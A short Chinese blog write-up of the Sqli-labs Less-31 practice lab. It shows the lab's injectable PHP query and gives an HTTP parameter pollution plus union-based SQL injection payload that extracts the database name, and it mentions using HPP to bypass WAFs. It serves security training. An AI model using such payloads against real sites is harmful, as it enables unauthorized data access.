首页 > 数据库技术 > 详细

Sqli-labs Less-31 HPP参数污染攻击

时间:2020-04-09 22:29:21      阅读:93      评论:0      收藏:0      [点我收藏+]

Less-31与前面两关的方式是一样的,我们直接看到less-31的sql语句:

$id=$_GET[‘id‘];
$id = ‘"‘ .$id. ‘"‘;
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

所以payload为:

http://127.0.0.1/sql/Less-31/login.php?id=1&id=-1") union select 1,database(),3--+

技术分享图片

 

总结:从以上三关中,我们主要学习到的是不同服务器对于参数的不同处理,HPP的应用有很多,不仅仅是我们上述列出过WAF一个方面,还有可以执行重复操作,可以执行非法操作等。同时针对WAF的绕过,我们这里也仅仅是抛砖引玉,后续的很多的有关HPP的方法需要共同去研究。这也是一个新的方向。

 

参考:https://www.cnblogs.com/lcamry/p/5762946.html

Sqli-labs Less-31 HPP参数污染攻击

原文:https://www.cnblogs.com/zhengna/p/12660141.html

(1)
(1)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!